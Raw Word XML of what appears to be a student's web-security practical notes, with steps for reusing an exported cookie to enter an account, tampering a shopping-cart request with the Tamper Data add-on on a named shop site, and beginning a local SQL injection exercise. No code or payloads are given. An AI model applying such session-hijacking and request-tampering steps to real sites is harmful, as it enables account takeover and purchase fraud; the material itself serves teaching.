      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Paste the cookie in the tool which you have exported and click on green tick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4914900" cy="4867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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>And you are in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6070600" cy="293878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63221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tamper DATA add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Search and install Temper Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Select a website for tempering data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>razorba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5969165" cy="31070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904" cy="311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221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Select any item to but</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click to add cart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click on tool for tempering Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6016666" cy="314007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179" cy="314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221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Start tempering the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2790825" cy="27908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221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Here you go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1666875" cy="12287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221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="008F220A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00CF4123">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="256"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>AIM: Perform</w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Open XAMPP and start apache and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25146880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165261</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4758369" cy="3108674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="545" name="image2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271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8369" cy="3108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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to web browser and enter site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>phpmyadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00E643D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:pict>
          <v:group id=" 180" o:spid="_x0000_s1041" style="position:absolute;margin-left:70.6pt;margin-top:11.95pt;width:470.95pt;height:241.4pt;z-index:251932672;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1412,239" coordsize="9419,4828" o:gfxdata="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Ndy79e614AAAD//wMAUEsDBBQABgAIAAAA&#10;IQCO0Kqw5AAAABEBAAAPAAAAZHJzL2Rvd25yZXYueG1sTE9La8JAEL4X+h+WKfRWN5tUa2M2IvZx&#10;kkJVkN7G7JgEs7shuybx33c9tZeBj/me2XLUDeupc7U1EsQkAkamsKo2pYT97uNpDsx5NAoba0jC&#10;lRws8/u7DFNlB/NN/daXLJgYl6KEyvs25dwVFWl0E9uSCb+T7TT6ALuSqw6HYK4bHkfRjGusTUio&#10;sKV1RcV5e9ESPgccVol47zfn0/r6s5t+HTaCpHx8GN8W4awWwDyN/k8Btw2hP+Sh2NFejHKsCfhZ&#10;xIEqIU5egd0I0TwRwI4SptHsBRjPM/5/Sf4LAAD//wMAUEsDBAoAAAAAAAAAIQCiQ45YkqoBAJKq&#10;AQAVAAAAZHJzL21lZGlhL2ltYWdlMS5qcGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMC&#10;AgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIU&#10;FRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBT/wAARCAJlA2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